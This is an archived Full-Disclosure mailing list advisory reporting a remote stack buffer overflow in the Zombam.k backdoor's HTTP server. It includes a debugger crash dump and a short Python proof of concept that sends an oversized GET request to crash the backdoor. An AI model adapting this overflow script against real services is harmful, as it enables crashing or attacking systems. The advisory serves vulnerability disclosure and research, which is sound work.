lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 4 Jan 2021 17:25:42 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Zombam.k / Remote Stack Buffer Overflow

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/79d9908b6769e64f922e74a090f5ceeb.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.k
Vulnerability: Remote String Dereference Stack Buffer Overflow

Description: HTTP RAT 0.21 Backdoor Webserver By z0mbie, create's on the
fly executable backdoors that can listen on various ports you specify. The
main executable
then spits out a binary named "httpserver.exe" listening on the port
specified in the backdoor creation steps. Sadly, the backdoor is vulnerable
to stack buffer overflow
by sending a large HTTP GET request of 1000 bytes or so to the listening
backdoor port.

Type: PE32
MD5: 79d9908b6769e64f922e74a090f5ceeb
Vuln ID: MVID-2021-0015
Dropped files: httpserver.exe

ASLR: False
DEP: False
Safe SEH: True
Disclosure: 1/4/2021

Memory Dump:
EAX : 0574FA40
EBX : 03FE02A0
ECX : 00000415     L'Е'
EDX : 41414141
EBP : 0574FA28
ESP : 0574F9F0
ESI : 03FE02A0
EDI : 00405076     httpserver.00405076
EIP : 00402906     httpserver.00402906


(12f4.e58): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=0494fa20 edx=41414141 esi=00000003
edi=00000003
eip=773ced3c esp=0494f0bc ebp=0494f24c iopl=0         nv up ei pl nz na po
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400          ret     14h


0:004> .ecxr
eax=0494f9f0 ebx=04020300 ecx=0494fa20 edx=41414141 esi=04020300
edi=00405076
eip=0040292e esp=0494f9d8 ebp=0494fa28 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
*** WARNING: Unable to verify checksum for httpserver.exe
*** ERROR: Module load completed but symbols could not be loaded for
httpserver.exe
httpserver+0x292e:
0040292e 8b4204          mov     eax,dword ptr [edx+4]
ds:002b:41414145=????????

FAULTING_IP:
httpserver+292e
0040292e 8b4204          mov     eax,dword ptr [edx+4]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040292e (httpserver+0x0000292e)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414145
Attempt to read from address 41414145

PROCESS_NAME:  httpserver.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  41414145

READ_ADDRESS:  41414145

FOLLOWUP_IP:
httpserver+292e
0040292e 8b4204          mov     eax,dword ptr [edx+4]

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00000e58

BUGCHECK_STR:
 APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 004024ce to 0040292e

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
0494fa28 004024ce 41414141 0494fa40 00000415 httpserver+0x292e
0494faa4 41414141 41414141 41414141 41414141 httpserver+0x24ce
0494faa8 41414141 41414141 41414141 41414141 0x41414141
0494faac 41414141 41414141 41414141 41414141 0x41414141
0494fab0 41414141 41414141 41414141 41414141 0x41414141
0494fab4 41414141 41414141 41414141 41414141 0x41414141


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

JUNK="A"*2000
PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
s.close()
print("Remote Buffer Overflow")
print("MD5: 79d9908b6769e64f922e74a090f5ceeb")
print("By Malvuln")



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ